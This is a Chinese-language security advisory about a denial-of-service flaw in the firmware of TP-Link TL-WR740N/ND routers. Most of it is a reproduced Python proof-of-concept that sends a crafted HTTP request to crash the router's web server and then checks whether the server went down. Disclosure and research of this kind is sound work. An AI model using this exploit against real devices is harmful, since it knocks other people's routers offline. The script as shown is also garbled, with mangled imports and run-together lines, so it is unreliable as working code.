发布日期:2013-12-03
更新日期:2013-12-05受影响系统:
TP-LINK TL-WR740N
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 64068TL-WR740N及TL-WR740ND都是150Mbps的无线路由器。TP-Link TL-WR740N/TL-WR740ND 固件版本3.12.11 Build 120320 Rel.51047n在处理特制HTTP请求时存在拒绝服务漏洞,攻击者可利用此漏洞导致受影响设备崩溃。<*来源:Dino Caus
链接:http://www.exploit-db.com/exploits/29919/
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/python
import socket
import import
sys urllib2host = ""
port = 0
if(len(sys.argv) >= 2):
host = sys.argv[1]
port = sys.argv[2]
else:
print "Invalid number of the arguments."
print "Usage <server> <port>"
exit(1)
print "Connecting on ",host,":",ports = socket.socket();
stringOfDeath = "GET / HTTP/1.1
";
stringOfDeath = stringOfDeath + "Accept-Encoding: identity
";
stringOfDeath = stringOfDeath + "Host: "+ host + "
";
stringOfDeath = stringOfDeath + "Connection: close
";
stringOfDeath = stringOfDeath + "User-Agent: PythonLib/2.7
";s.connect((host,int(port)))print "Sending packet..."
s.send(stringOfDeath)
print "Packet sent."
print "Check if router http server down..."try:
response = urllib2.urlopen("http://"+host+":"+port,None,5)
response.read()
except socket.timeout:
print "Timeout occured, http server probaly down."
exit(1)建议:
--------------------------------------------------------------------------------
厂商补丁:TP-LINK
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.tp-link.com.au/products/details/?model=TL-WR740NRuby on Rails "number_to_currency" 帮助程序跨站脚本执行漏洞(CVE-2013-6415)up.time Agent 缓冲区溢出漏洞相关资讯 TP-LINK TP-Link漏洞
- TP-Link与FCC和解,允许路由器安装 (08月02日)
- TP-Link将禁止安装第三方开源固件 (03月12日)
- Google与TP-LINK推出无线路由器 (08/19/2015 11:46:19)
| - TP-LINK失去了两个设备配置域名的 (07月06日)
- TP-Link开始锁定路由器固件禁止安 (02月19日)
- 多个TP-LINK产品目录遍历漏洞(CVE- (04/20/2015 17:24:00)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一
|